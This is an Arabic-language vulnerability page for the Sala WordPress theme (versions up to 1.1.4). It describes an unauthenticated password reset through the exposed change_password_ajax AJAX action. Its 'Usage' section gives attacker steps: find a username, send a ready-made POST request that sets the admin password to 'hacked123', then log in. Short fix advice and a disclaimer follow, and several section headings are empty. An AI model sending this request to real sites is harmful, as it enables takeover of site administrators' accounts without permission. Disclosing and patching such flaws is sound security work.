
Sala - قالب ووردبريس للشركات الناشئة و SaaS <= 1.1.4 - تصعيد غير مصادق عليه للصلاحيات عبر إعادة تعيين كلمة المرور/الاستيلاء على الحساب
🔥 ملخص الثغرة
قالب ووردبريس Sala الإصدارات <= 1.1.4 يعاني من ثغرة تصعيد غير مصادق للامتيازات. تسمح هذه الثغرة للمهاجمين غير المصادقين بإعادة تعيين كلمات المرور لمستخدمين عشوائيين — بما في ذلك المسؤولين — عن طريق استدعاء نقطة نهاية AJAX مكشوفة مباشرة دون التحقق من هوية الطالب.
تنشأ هذه الثغرة من الدالة change_password_ajax المسجلة في wp_ajax_nopriv_، والتي تقوم بتعيين كلمة مرور جديدة لأي تسجيل دخول صالح للمستخدم دون التحقق من أن الطلب مصرح به.
🔍 القالب المتأثر
🧪 ميزات الاستغلال
/wp-admin/admin-ajax.php?action=change_password_ajax🧠 الباحث
🚀 الاستخدام
تحديد اسم مستخدم صالح على موقع ووردبريس الهدف. يمكنك فعل ذلك من خلال التحقق من:
/author/username)قم بإنشاء طلب POST التالي لإعادة تعيين كلمة مرور المستخدم:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: targetsite.com
Content-Type: application/x-www-form-urlencoded
action=change_password_ajax&login=admin&new_password=hacked123
إذا نجح الأمر، يمكنك الآن تسجيل الدخول كمستخدم الهدف باستخدام كلمة المرور الجديدة (hacked123 في المثال أعلاه).
قم بزيارة /wp-login.php للتحقق من الوصول.
🛠 توصيات الإصلاح
wp_ajax_nopriv_change_password_ajax.is_user_logged_in() والتحقق من هوية المستخدم قبل السماح بالإجراءات الحساسة.🔒 إخلاء مسؤولية:
هذه المعلومات مقدمة لأغراض تعليمية واختبار الاختراق المصرح به فقط. الاستغلال غير المصرح به للأنظمة غير قانوني وغير أخلاقي.
📚 مرجع: